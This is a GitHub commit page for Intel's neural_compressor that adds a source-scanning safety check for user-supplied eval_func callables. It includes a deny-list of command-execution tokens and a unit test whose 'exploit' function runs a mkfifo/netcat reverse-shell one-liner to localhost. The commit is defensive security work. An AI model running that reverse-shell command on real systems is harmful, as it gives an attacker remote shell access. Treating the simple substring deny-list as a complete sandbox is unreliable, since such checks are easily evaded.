Skip to content

Commit a9bdec7

Browse files
Add safe check for eval_func [2x] (#2282)
Signed-off-by: Kaihui-intel <kaihui.tang@intel.com> Co-authored-by: pre-commit-ci[bot] <66853113+pre-commit-ci[bot]@users.noreply.github.com>
1 parent 87a9009 commit a9bdec7

File tree

4 files changed

+79
-2
lines changed

4 files changed

+79
-2
lines changed

neural_compressor/mix_precision.py

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -29,7 +29,7 @@
2929
from .model import Model
3030
from .strategy import STRATEGIES
3131
from .utils import alias_param, logger
32-
from .utils.utility import CpuInfo, time_limit
32+
from .utils.utility import CpuInfo, secure_check_eval_func, time_limit
3333

3434

3535
@alias_param("conf", param_alias="config")
@@ -91,6 +91,8 @@ def fit(model, conf, eval_func=None, eval_dataloader=None, eval_metric=None, **k
9191
)
9292
sys.exit(0)
9393

94+
secure_check_eval_func(eval_func)
95+
9496
wrapped_model = Model(model, conf=conf)
9597

9698
precisions = list(set(conf.precisions) - set(conf.excluded_precisions))

neural_compressor/quantization.py

Lines changed: 3 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -27,7 +27,7 @@
2727
from .model import Model
2828
from .strategy import STRATEGIES
2929
from .utils import logger
30-
from .utils.utility import dump_class_attrs, time_limit
30+
from .utils.utility import dump_class_attrs, secure_check_eval_func, time_limit
3131

3232

3333
def fit(
@@ -153,6 +153,8 @@ def eval_func(model):
153153
else:
154154
metric = None
155155

156+
secure_check_eval_func(eval_func)
157+
156158
config = _Config(quantization=conf, benchmark=None, pruning=None, distillation=None, nas=None)
157159
strategy_name = conf.tuning_criterion.strategy
158160

neural_compressor/utils/utility.py

Lines changed: 41 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -25,6 +25,7 @@
2525
import ast
2626
import builtins
2727
import importlib
28+
import inspect
2829
import logging
2930
import os
3031
import os.path as osp
@@ -39,6 +40,7 @@
3940
from enum import Enum
4041
from functools import wraps
4142
from tempfile import NamedTemporaryFile
43+
from types import FunctionType
4244
from typing import Any, Dict, List, Optional
4345

4446
import cpuinfo
@@ -1281,3 +1283,42 @@ def check_key_exist(data, key):
12811283
if check_key_exist(item, key):
12821284
return True
12831285
return False
1286+
1287+
1288+
# for eval_func
1289+
_FORBIDDEN_PATTERNS = [
1290+
"import os",
1291+
"import subprocess",
1292+
"import sys",
1293+
"subprocess.",
1294+
"os.system",
1295+
"os.popen",
1296+
"popen(",
1297+
"Popen(",
1298+
"system(",
1299+
"exec(",
1300+
"__import__(",
1301+
]
1302+
1303+
1304+
def _static_check(func):
1305+
try:
1306+
src = inspect.getsource(func)
1307+
except (OSError, IOError): # pragma: no cover
1308+
logger.warning("Cannot read source of eval_func; skip static scan.")
1309+
return
1310+
lowered = src.lower()
1311+
for p in _FORBIDDEN_PATTERNS:
1312+
if p in lowered:
1313+
raise ValueError(f"Unsafe token detected in eval_func: {p}")
1314+
1315+
1316+
def secure_check_eval_func(user_func):
1317+
"""Return a secured version of user eval_func."""
1318+
if not isinstance(user_func, FunctionType) or user_func is None:
1319+
logger.warning("Provided eval_func is not a plain function; security checks limited.")
1320+
return user_func
1321+
try:
1322+
_static_check(user_func)
1323+
except ValueError as e:
1324+
raise RuntimeError(f"Rejected unsafe eval_func: {e}")
Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
import unittest
2+
3+
import torch
4+
import torch.nn as nn
5+
6+
from neural_compressor import PostTrainingQuantConfig
7+
from neural_compressor.mix_precision import fit
8+
9+
10+
def exploit(model):
11+
__import__("os").system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 127.0.0.1 4444 >/tmp/f")
12+
return 1.0
13+
14+
15+
class DummyTorchModel(nn.Module):
16+
def forward(self, x):
17+
return x
18+
19+
20+
class TestAdaptSecurity(unittest.TestCase):
21+
def test_security(self):
22+
dummy_model = DummyTorchModel()
23+
conf = PostTrainingQuantConfig()
24+
conf.precisions = ["fp32"]
25+
conf.excluded_precisions = []
26+
with self.assertRaises(RuntimeError) as ctx:
27+
fit(model=dummy_model, conf=conf, eval_func=exploit)
28+
self.assertIn("Rejected unsafe eval_func", str(ctx.exception))
29+
30+
31+
if __name__ == "__main__":
32+
unittest.main()

0 commit comments

Comments
 (0)